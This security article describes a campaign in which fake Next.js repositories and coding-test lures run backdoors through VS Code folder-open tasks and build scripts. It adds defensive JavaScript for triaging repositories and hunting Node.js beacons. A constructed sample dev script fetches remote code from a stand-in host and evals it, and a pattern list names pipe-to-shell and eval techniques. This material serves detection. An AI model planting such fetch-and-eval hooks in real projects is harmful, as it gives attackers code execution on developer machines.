How Malicious Repositories Trick Developers with Multi-Stage Backdoors
Microsoft has uncovered a coordinated campaign that targets software developers with fake repositories posing as legitimate Next.js projects and technical assessments. The repositories are built to blend into everyday workflows, so the malicious code runs as a side effect of ordinary actions such as opening, building or starting the project rather than anything the developer would recognise as risky. The backdoor stays out of sight while the attackers gain access to developer machines, which typically hold source code, secrets and credentials.
Deceptive Tactics and Delivery Methods
The attackers created repositories that look legitimate, following common naming patterns and project structures. In some cases, opening the project in Visual Studio Code was enough: the repository shipped workspace settings whose tasks were configured to run on folder open, so the malicious command executed as soon as the developer opened and trusted the folder, with no build, install or script invocation required. The practical caveat is that VS Code's Workspace Trust is the only gate here. Such tasks do not run while a folder is in Restricted Mode, so the decision to trust a repository from an unknown source is the decision that runs the attacker's code.
Other variants attach to the build or server-startup routines instead: starting the project's development server or running a build triggers the backdoor, giving the attackers a foothold in the developer's environment. Because these are the commands a developer runs within minutes of cloning a project, the execution looks like normal development activity and is hard to tell apart from it.
The repositories retrieve additional JavaScript payloads from remote servers and execute them in memory rather than writing them to disk, which leaves little for file-based scanning or hash matching to find. The payloads operate in stages: an initial component fingerprints the host and executes bootstrap instructions, after which the malware communicates with command-and-control servers for persistence and further actions.
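The two auto-execution hooks described above, a task that fires when the folder is opened and a project script that pulls code from a remote server and evaluates it, can both be spotted statically before anything runs. The following is an added example, not code from the Microsoft report or from the article: a small triage check to run over a freshly cloned repository before opening it in an editor or running any npm script. The tasks.json and package.json contents are constructed samples (the host names use the reserved .invalid TLD), and the pattern list is a heuristic starting point rather than a complete signature set.

```javascript
// Added example (not from the Microsoft report or the article): static triage of
// a cloned repository for the auto-run hooks the campaign relies on. The sample
// file contents below are constructed.

// VS Code runs a task with no user interaction when tasks.json sets
// "runOptions": { "runOn": "folderOpen" } and the folder is trusted.
const AUTO_RUN_TRIGGERS = new Set(['folderOpen']);

// npm runs these without an explicit "npm run <name>" during install, or they
// are the first commands a developer types for a Next.js project.
const IMPLICIT_SCRIPTS = new Set([
  'preinstall', 'install', 'postinstall', 'prepare',
  'prestart', 'start', 'predev', 'dev', 'prebuild', 'build',
]);

// Heuristics for "download something and execute it in memory".
const REMOTE_EXEC_PATTERNS = [
  { id: 'pipe-to-interpreter', re: /\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|node)\b/i },
  { id: 'inline-node-eval', re: /\bnode\s+(-e|--eval)\b/ },
  { id: 'eval-or-function', re: /\beval\b|\bnew\s+Function\b|\bvm\.runIn\w+Context\b/ },
  { id: 'remote-url', re: /\bhttps?:\/\/[^\s'"]+/i },
];

// tasks.json is JSONC, so strip // and /* */ comments that sit outside strings
// (a naive regex would eat the "//" inside any URL in a command string).
function stripJsonComments(text) {
  let out = '';
  let inString = false;
  for (let i = 0; i < text.length; i++) {
    const c = text[i];
    const next = text[i + 1];
    if (inString) {
      out += c;
      if (c === '\\') { out += next ?? ''; i++; }
      else if (c === '"') inString = false;
    } else if (c === '"') {
      inString = true;
      out += c;
    } else if (c === '/' && next === '/') {
      while (i < text.length && text[i] !== '\n') i++;
      out += '\n';
    } else if (c === '/' && next === '*') {
      const end = text.indexOf('*/', i + 2);
      i = end === -1 ? text.length : end + 1;
    } else {
      out += c;
    }
  }
  return out;
}

// Tasks that execute on folder open, i.e. before the developer does anything.
function findAutoRunTasks(tasksJsonText) {
  const config = JSON.parse(stripJsonComments(tasksJsonText));
  const findings = [];
  for (const task of config.tasks || []) {
    const trigger = task.runOptions && task.runOptions.runOn;
    if (!AUTO_RUN_TRIGGERS.has(trigger)) continue;
    findings.push({
      source: '.vscode/tasks.json', name: task.label, trigger, severity: 'high',
      command: [task.command, ...(task.args || [])].join(' '),
    });
  }
  return findings;
}

// Scripts that look like remote fetch-and-execute; a hook npm or the developer
// runs implicitly is rated high, anything else is queued for review.
function findSuspiciousScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const findings = [];
  for (const [name, command] of Object.entries(pkg.scripts || {})) {
    const patterns = REMOTE_EXEC_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.id);
    if (patterns.length === 0) continue;
    findings.push({
      source: 'package.json', name, command, patterns,
      severity: IMPLICIT_SCRIPTS.has(name) ? 'high' : 'review',
    });
  }
  return findings;
}

function triageRepo({ tasksJson, packageJson }) {
  return [...findAutoRunTasks(tasksJson), ...findSuspiciousScripts(packageJson)];
}

// Constructed sample: one ordinary task and one that fires on folder open.
const SAMPLE_TASKS_JSON = `{
  // comments are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    { "label": "lint", "type": "shell", "command": "npm run lint" },
    { "label": "Prepare workspace", "type": "shell", "command": "node",
      "args": ["./scripts/prepare.js"], "runOptions": { "runOn": "folderOpen" } }
  ]
}`;

// Constructed sample: the dev script fetches remote JS and evals it in memory.
const SAMPLE_PACKAGE_JSON = String.raw`{
  "name": "nextjs-assessment",
  "scripts": {
    "dev": "node -e \"fetch('https://cdn.example.invalid/a.js').then(r=>r.text()).then(eval)\" && next dev",
    "build": "next build",
    "lint": "next lint",
    "fetch:schema": "curl -sSf https://api.example.invalid/schema.json -o schema.json"
  }
}`;

console.log(JSON.stringify(triageRepo({ tasksJson: SAMPLE_TASKS_JSON, packageJson: SAMPLE_PACKAGE_JSON }), null, 2));
```

On the constructed input the check reports the folder-open task and the dev script as high severity and the plain curl download as review-only. A clean result does not prove a repository safe (the payload can also hide in the Next.js config or a dependency), but a hit on either hook is reason enough not to trust the folder.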
How the Campaign Works and Its Connection to Broader Threats
The campaign appears to be part of a larger cluster of threats that use job-themed lures, such as coding tests sent to candidates, to reach their targets. Microsoft's telemetry showed that once a developer cloned or opened one of these repositories, the malware could establish persistence and enable additional malicious actions, such as data exfiltration or further payload delivery.
The investigation started when suspicious outbound connections from Node.js processes were detected. Following those connections back led analysts to the original infection points, which were often disguised as technical assessments or coding tests hosted on platforms like Bitbucket. The repositories used consistent naming conventions and project "families", which made it easier for researchers to link related malicious code.
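The detection pivot described above, a Node.js process making outbound connections it has no business making, is something a defender can turn into a hunting rule. Below is an added example, not code from the Microsoft report or from the article: a scoring pass over process-network telemetry that raises editor-spawned node processes and node processes reaching unknown destinations on unusual ports. The log format, field names, allow-list, thresholds and every event line are constructed assumptions; map them onto your EDR's schema before use.

```javascript
// Added example (not from the Microsoft report or the article): hunting for
// Node.js processes beaconing out, using constructed telemetry lines.

// Destinations a Node.js process on a developer box legitimately talks to
// (assumed allow-list; extend with your registry mirrors and CI hosts).
const KNOWN_DEV_HOSTS = new Set(['registry.npmjs.org', 'registry.yarnpkg.com', 'github.com']);

// An editor spawning node that immediately reaches the network matches the
// folder-open task pattern; an interactive shell doing so is routine.
const EDITOR_PARENTS = new Set(['code', 'code.exe', 'code-insiders']);

// Constructed events: an editor-spawned task calling out, an npm install,
// a Next.js dev server bound locally, and that dev server calling out.
const SAMPLE_EVENTS = [
  '2025-01-15T09:12:01Z host=dev01 proc=node parent=Code.exe cmd="node ./scripts/prepare.js" dst=203.0.113.7 dport=443 sni=-',
  '2025-01-15T09:12:40Z host=dev01 proc=node parent=bash cmd="npm install" dst=104.16.0.35 dport=443 sni=registry.npmjs.org',
  '2025-01-15T09:14:10Z host=dev01 proc=node parent=bash cmd="next dev" dst=127.0.0.1 dport=3000 sni=-',
  '2025-01-15T09:14:12Z host=dev01 proc=node parent=bash cmd="next dev" dst=198.51.100.22 dport=8443 sni=-',
];

// Parse "<timestamp> key=value key="quoted value" ..." into an object.
function parseEvent(line) {
  const event = { ts: line.slice(0, line.indexOf(' ')) };
  for (const m of line.matchAll(/(\w+)=(?:"([^"]*)"|(\S+))/g)) {
    event[m[1]] = m[2] ?? m[3];
  }
  return event;
}

// Loopback and RFC 1918 space; a dev server talking to itself is not a beacon.
function isLocalAddress(ip) {
  return ip === '::1' || /^127\./.test(ip) || /^10\./.test(ip) ||
    /^192\.168\./.test(ip) || /^172\.(1[6-9]|2\d|3[01])\./.test(ip);
}

// Attach a score and the reasons behind it to one event.
function scoreEvent(ev) {
  const reasons = [];
  if (ev.proc !== 'node' && ev.proc !== 'node.exe') return { ...ev, score: 0, reasons };
  const remote = !isLocalAddress(ev.dst);
  if (remote && !KNOWN_DEV_HOSTS.has(ev.sni)) reasons.push('outbound to unknown destination');
  if (EDITOR_PARENTS.has((ev.parent || '').toLowerCase())) reasons.push('spawned by editor');
  if (remote && !['80', '443'].includes(ev.dport)) reasons.push(`non-standard port ${ev.dport}`);
  return { ...ev, score: reasons.length, reasons };
}

// Return the events worth a human look: two or more independent signals.
function huntNodeBeacons(lines, threshold = 2) {
  return lines.map(parseEvent).map(scoreEvent).filter((ev) => ev.score >= threshold);
}

for (const hit of huntNodeBeacons(SAMPLE_EVENTS)) {
  console.log(`${hit.ts} ${hit.host} ${hit.cmd} -> ${hit.dst}:${hit.dport} [${hit.reasons.join('; ')}]`);
}
```

On the constructed lines the npm install to the registry and the dev server on loopback score zero, while the editor-spawned script and the dev server calling a public address on 8443 are both flagged. The second of these is the harder case: the process name and command line are exactly what a legitimate Next.js session looks like, which is why the destination, not the process, carries the signal.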
The attackers exploited the trust developers place in shared code and open source projects. By embedding the malicious tasks in seemingly harmless repositories, they gained access to high-value systems that often contain source code, environment secrets, and access credentials for cloud services or internal networks, which is what makes the campaign both dangerous and effective.
Overall, this campaign highlights the importance of scrutinizing third-party repositories and being cautious when opening projects from untrusted sources. In practice that means reviewing a repository's workspace settings and package scripts before trusting the folder or running an install, leaving untrusted projects in the editor's restricted mode so that auto-run tasks stay disabled, and monitoring development machines for Node.js processes that make unexpected outbound connections. Developers should be aware of the risks and ensure their development environments are properly secured and monitored for suspicious activity.